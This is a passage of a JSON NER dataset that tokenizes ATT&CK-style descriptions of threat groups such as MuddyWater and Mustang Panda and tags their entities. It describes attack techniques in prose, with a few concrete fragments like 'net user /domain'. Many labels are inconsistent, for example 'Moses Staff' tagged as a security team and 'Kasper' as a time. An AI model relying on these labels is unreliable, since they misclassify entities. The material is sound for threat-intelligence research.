"tokens": [ "Metador", "has", "used", "Microsoft's", "Console", "Debugger", "in", "some", "of", "their", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "B-Org", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metador", "has", "used", "HTTP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Metador", "has", "used", "the", "Windows", "command", "line", "to", "execute", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metador", "has", "established", "persistence", "through", "the", "use", "of", "a", "WMI", "event", "subscription", "combined", "with", "unusual", "living-off-the-land", "binaries", "such", "as", "`cdb.exe`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Moafee", "has", "been", "known", "to", "employ", "binary", "padding." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "Mofang", "has", "compressed", "the", "ShimRat", "executable", "within", "malicious", "email", "attachments.", "Mofang", "has", "also", "encrypted", "payloads", "before", "they", "are", "downloaded", "to", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mofang's", "malicious", "spearphishing", "attachments", "required", "a", "user", "to", "open", "the", "file", "after", "receiving." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mofang's", "spearphishing", "emails", "required", "a", "user", "to", "click", "the", "link", "to", "connect", "to", "a", "compromised", "website." ], "ner_tags": [ "B-Idus", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mofang", "delivered", "spearphishing", "emails", "with", "malicious", "documents,", "PDFs,", "or", "Excel", "files", "attached." ], "ner_tags": [ "B-Idus", "O", "B-Way", "I-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Mofang", "delivered", "spearphishing", "emails", "with", "malicious", "links", "included." ], "ner_tags": [ "B-Idus", "O", "B-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Molerats", "has", "used", "forged", "Microsoft", "code-signing", "certificates", "on", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "B-Tool", "O", "O" ] }, { "tokens": [ "Molerats", "used", "the", "public", "tool", "BrowserPasswordDump10", "to", "dump", "passwords", "saved", "in", "browsers", "on", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Molerats", "decompresses", "ZIP", "files", "once", "on", "the", "victim", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Molerats", "has", "delivered", "compressed", "executables", "within", "ZIP", "files", "to", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Tool", "B-Way", "O", "O" ] }, { "tokens": [ "Molerats", "used", "executables", "to", "download", "malicious", "files", "from", "different", "sources." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Molerats", "used", "various", "implants,", "including", "those", "built", "with", "JS,", "on", "target", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Molerats", "has", "sent", "malicious", "files", "via", "email", "that", "tricked", "users", "into", "clicking", "Enable", "Content", "to", "run", "an", "embedded", "macro", "and", "to", "download", "malicious", "archives." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "I-SamFile", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Molerats", "has", "sent", "malicious", "links", "via", "email", "trick", "users", "into", "opening", "a", "RAR", "archive", "and", "running", "an", "executable." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Molerats", "has", "used", "msiexec.exe", "to", "execute", "an", "MSI", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Molerats", "used", "PowerShell", "implants", "on", "target", "machines." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Molerats", "actors", "obtained", "a", "list", "of", "active", "processes", "on", "the", "victim", "and", "sent", "them", "to", "C2", "servers." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Molerats", "saved", "malicious", "files", "within", "the", "AppData", "and", "Startup", "folders", "to", "maintain", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Molerats", "has", "created", "scheduled", "tasks", "to", "persistently", "run", "VBScripts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Molerats", "has", "sent", "phishing", "emails", "with", "malicious", "Microsoft", "Word", "and", "PDF", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "I-Tool", "I-Tool", "O", "I-Tool", "O" ] }, { "tokens": [ "Molerats", "has", "sent", "phishing", "emails", "with", "malicious", "links", "included." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Molerats", "used", "various", "implants,", "including", "those", "built", "with", "VBScript,", "on", "target", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Moses", "Staff", "has", "used", "signed", "drivers", "from", "an", "open", "source", "tool", "called", "DiskCryptor", "to", "evade", "detection." ], "ner_tags": [ "I-SecTeam", "I-SecTeam", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Moses", "Staff", "has", "used", "batch", "scripts", "that", "can", "disable", "the", "Windows", "firewall", "on", "specific", "remote", "machines." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "I-Tool", "I-Tool", "O", "O", "B-SamFile", "O", "O", "B-OffAct", "O", "O", "O", "O" ] }, { "tokens": [ "Moses", "Staff", "has", "used", "obfuscated", "web", "shells", "in", "their", "operations." ], "ner_tags": [ "B-HackOrg", "B-Org", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "Moses", "Staff", "has", "exploited", "known", "vulnerabilities", "in", "public-facing", "infrastructure", "such", "as", "Microsoft", "Exchange", "Servers." ], "ner_tags": [ "B-HackOrg", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Moses", "Staff", "has", "downloaded", "and", "installed", "web", "shells", "to", "following", "path", "<code>C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\IISpool.aspx</code>." ], "ner_tags": [ "I-SecTeam", "I-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Moses", "Staff", "has", "collected", "the", "administrator", "username", "from", "a", "compromised", "host." ], "ner_tags": [ "I-SecTeam", "I-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Moses", "Staff", "has", "built", "malware,", "such", "as", "DCSrv", "and", "PyDCrypt,", "for", "targeting", "victims'", "machines." ], "ner_tags": [ "I-SecTeam", "I-SecTeam", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Moses", "Staff", "has", "used", "batch", "scripts", "that", "can", "enable", "SMB", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SecTeam", "B-Org", "O", "O", "B-Tool", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Moses", "Staff", "collected", "information", "about", "the", "infected", "host,", "including", "the", "machine", "names", "and", "OS", "architecture." ], "ner_tags": [ "I-SecTeam", "I-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Moses", "Staff", "has", "collected", "the", "domain", "name", "of", "a", "compromised", "network." ], "ner_tags": [ "I-SecTeam", "I-SecTeam", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Moses", "Staff", "has", "used", "the", "commercial", "tool", "DiskCryptor." ], "ner_tags": [ "I-SecTeam", "I-SecTeam", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Moses", "Staff", "has", "dropped", "a", "web", "shell", "onto", "a", "compromised", "system." ], "ner_tags": [ "I-SecTeam", "I-SecTeam", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "MoustachedBouncer", "has", "injected", "content", "into", "DNS,", "HTTP,", "and", "SMB", "replies", "to", "redirect", "specifically-targeted", "victims", "to", "a", "fake", "Windows", "Update", "page", "to", "download", "malware." ], "ner_tags": [ "B-Idus", "O", "I-Way", "I-Way", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MoustachedBouncer", "has", "exploited", "CVE-2021-1732", "to", "execute", "malware", "components", "with", "elevated", "rights." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MoustachedBouncer", "has", "used", "JavaScript", "to", "deliver", "malware", "hosted", "on", "HTML", "pages." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "MoustachedBouncer", "has", "used", "plugins", "to", "execute", "PowerShell", "scripts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MoustachedBouncer", "has", "used", "a", "reverse", "proxy", "tool", "similar", "to", "the", "GitHub", "repository", "revsocks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MoustachedBouncer", "has", "used", "plugins", "to", "save", "captured", "screenshots", "to", "`.\\AActdata\\`", "on", "an", "SMB", "share." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "MoustachedBouncer", "has", "used", "plugins", "to", "take", "screenshots", "on", "targeted", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MoustachedBouncer", "has", "used", "malware", "plugins", "packed", "with", "Themida." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "MuddyWater", "has", "used", "the", "native", "Windows", "cabinet", "creation", "tool,", "makecab.exe,", "likely", "to", "compress", "stolen", "data", "to", "be", "uploaded." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "web", "services", "including", "OneHub", "to", "distribute", "remote", "access", "tools." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "uses", "various", "techniques", "to", "bypass", "UAC." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "MuddyWater", "has", "used", "CMSTP.exe", "and", "a", "malicious", "INF", "to", "execute", "its", "POWERSTATS", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "MuddyWater", "has", "performed", "credential", "dumping", "with", "LaZagne." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "MuddyWater", "has", "used", "Daniel", "Bohannon’s", "Invoke-Obfuscation", "framework", "and", "obfuscated", "PowerShell", "scripts.", "The", "group", "has", "also", "used", "other", "obfuscation", "methods,", "including", "Base64", "obfuscation", "of", "VBScripts", "and", "PowerShell", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Way", "B-Tool", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "the", ".NET", "csc.exe", "tool", "to", "compile", "executables", "from", "downloaded", "C#", "code." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "malware", "that", "has", "the", "capability", "to", "execute", "malicious", "code", "via", "COM,", "DCOM,", "and", "Outlook." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "MuddyWater", "has", "run", "a", "tool", "that", "steals", "passwords", "saved", "in", "victim", "email." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "performed", "credential", "dumping", "with", "LaZagne", "and", "other", "tools,", "including", "by", "dumping", "passwords", "saved", "in", "victim", "email." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "MuddyWater", "has", "run", "tools", "including", "Browser64", "to", "steal", "passwords", "saved", "in", "victim", "web", "browsers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "maintains", "persistence", "on", "victim", "networks", "through", "side-loading", "dlls", "to", "trick", "legitimate", "programs", "into", "running", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "decoded", "base64-encoded", "PowerShell,", "JavaScript,", "and", "VBScript." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "MuddyWater", "can", "disable", "the", "system's", "local", "proxy", "settings." ], "ner_tags": [ "B-Idus", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "<code>cmd.exe", "net", "user", "/domain</code>", "to", "enumerate", "domain", "users." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "malware", "that", "can", "execute", "PowerShell", "scripts", "via", "DDE." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "MuddyWater", "has", "used", "C2", "infrastructure", "to", "receive", "exfiltrated", "data." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "exploited", "the", "Microsoft", "Exchange", "memory", "corruption", "vulnerability", "(CVE-2020-0688)." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "MuddyWater", "has", "exploited", "the", "Office", "vulnerability", "CVE-2017-0199", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "exploited", "the", "Microsoft", "Netlogon", "vulnerability", "(CVE-2020-1472)." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Exp", "O", "B-Exp", "B-Features" ] }, { "tokens": [ "MuddyWater", "has", "controlled", "POWERSTATS", "from", "behind", "a", "proxy", "network", "to", "obfuscate", "the", "C2", "location.", "MuddyWater", "has", "used", "a", "series", "of", "compromised", "websites", "that", "victims", "connected", "to", "randomly", "to", "relay", "information", "to", "command", "and", "control", "(C2)." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "malware", "that", "checked", "if", "the", "ProgramData", "folder", "had", "folders", "or", "files", "with", "the", "keywords", "\"Kasper,\"", "\"Panda,\"", "or", "\"ESET.\"" ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Time", "B-HackOrg", "O", "B-Time" ] }, { "tokens": [ "MuddyWater", "has", "used", "malware", "that", "can", "upload", "additional", "files", "to", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "JavaScript", "files", "to", "execute", "its", "POWERSTATS", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "MuddyWater", "has", "performed", "credential", "dumping", "with", "LaZagne." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "MuddyWater", "has", "performed", "credential", "dumping", "with", "Mimikatz", "and", "procdump64.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "B-SamFile" ] }, { "tokens": [ "MuddyWater", "has", "stored", "a", "decoy", "PDF", "file", "within", "a", "victim's", "`%temp%`", "folder." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "attempted", "to", "get", "users", "to", "open", "malicious", "PDF", "attachment", "and", "to", "enable", "macros", "and", "launch", "malicious", "Microsoft", "Word", "documents", "delivered", "via", "spearphishing", "emails." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "I-SamFile", "I-SamFile", "I-SamFile", "O", "O", "B-Way", "O" ] }, { "tokens": [ "MuddyWater", "has", "distributed", "URLs", "in", "phishing", "e-mails", "that", "link", "to", "lure", "documents." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "disguised", "malicious", "executables", "and", "used", "filenames", "and", "Registry", "key", "names", "associated", "with", "Windows", "Defender." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "mshta.exe", "to", "execute", "its", "POWERSTATS", "payload", "and", "to", "pass", "a", "PowerShell", "one-liner", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "one", "C2", "to", "obtain", "enumeration", "scripts", "and", "monitor", "web", "logs,", "but", "a", "different", "C2", "to", "send", "data", "back." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "a", "Word", "Template,", "Normal.dotm,", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "O", "B-Way", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "PowerShell", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "malware", "to", "obtain", "a", "list", "of", "running", "processes", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "developed", "tools", "in", "Python", "including", "Out1." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "MuddyWater", "has", "added", "Registry", "Run", "key", "<code>KCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemTextEncoding</code>", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "legitimate", "applications", "ScreenConnect", "and", "AteraAgent", "to", "manage", "systems", "remotely", "and", "move", "laterally." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "malware", "that", "leveraged", "rundll32.exe", "in", "a", "Registry", "Run", "key", "to", "execute", "a", ".dll." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "MuddyWater", "has", "used", "scheduled", "tasks", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "malware", "that", "can", "capture", "screenshots", "of", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "malware", "to", "check", "running", "processes", "against", "a", "hard-coded", "list", "of", "security", "tools", "often", "used", "by", "malware", "researchers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "a", "PowerShell", "backdoor", "to", "check", "for", "Skype", "connectivity", "on", "the", "target", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "compromised", "third", "parties", "and", "used", "compromised", "accounts", "to", "send", "spearphishing", "emails", "with", "targeted", "attachments", "to", "recipients." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "sent", "targeted", "spearphishing", "e-mails", "with", "malicious", "links." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "tools", "to", "encode", "C2", "communications", "including", "Base64", "encoding." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "MuddyWater", "has", "stored", "obfuscated", "JavaScript", "code", "in", "an", "image", "file", "named", "temp.jpg." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "MuddyWater", "has", "used", "AES", "to", "encrypt", "C2", "responses." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "malware", "that", "can", "collect", "the", "victim’s", "OS", "version", "and", "machine", "name." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "malware", "to", "collect", "the", "victim’s", "IP", "address", "and", "domain", "name." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "a", "PowerShell", "backdoor", "to", "check", "for", "Skype", "connections", "on", "the", "target", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "malware", "that", "can", "collect", "the", "victim’s", "username." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "made", "use", "of", "legitimate", "tools", "ConnectWise", "and", "Remote", "Utilities", "to", "gain", "access", "to", "target", "environment." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "B-Tool", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "VBScript", "files", "to", "execute", "its", "POWERSTATS", "payload,", "as", "well", "as", "macros." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "file", "sharing", "services", "including", "OneHub,", "Sync,", "and", "TeraBox", "to", "distribute", "tools." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "MuddyWater", "has", "used", "a", "custom", "tool", "for", "creating", "reverse", "shells." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "O", "I-Features", "I-Features", "B-Tool" ] }, { "tokens": [ "MuddyWater", "has", "used", "malware", "that", "leveraged", "WMI", "for", "execution", "and", "querying", "host", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "encrypted", "documents", "with", "RC4", "prior", "to", "exfiltration." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "used", "RAR", "to", "create", "password-protected", "archives", "of", "collected", "documents", "prior", "to", "exfiltration." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "used", "custom", "batch", "scripts", "to", "collect", "files", "automatically", "from", "a", "targeted", "system." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "used", "junk", "code", "within", "their", "DLL", "files", "to", "hinder", "analysis." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "used", "a", "legitimately", "signed", "executable", "to", "execute", "a", "malicious", "payload", "within", "a", "DLL", "file." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "have", "acquired", "C2", "domains", "prior", "to", "operations." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "used", "an", "additional", "filename", "extension", "to", "hide", "the", "true", "file", "type." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "leveraged", "the", "legitimate", "email", "marketing", "service", "SMTP2Go", "for", "phishing", "campaigns." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "Mustang", "Panda", "has", "used", "a", "customized", "PlugX", "variant", "which", "could", "exfiltrate", "documents", "from", "air-gapped", "networks." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "exploited", "CVE-2017-0199", "in", "Microsoft", "Word", "to", "execute", "code." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Features", "O", "I-SamFile", "I-SamFile", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "will", "delete", "their", "tools", "and", "files,", "and", "kill", "processes", "after", "their", "objectives", "are", "reached." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mustang", "Panda", "has", "searched", "the", "entire", "target", "system", "for", "DOC,", "DOCX,", "PPT,", "PPTX,", "XLS,", "XLSX,", "and", "PDF", "files." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", 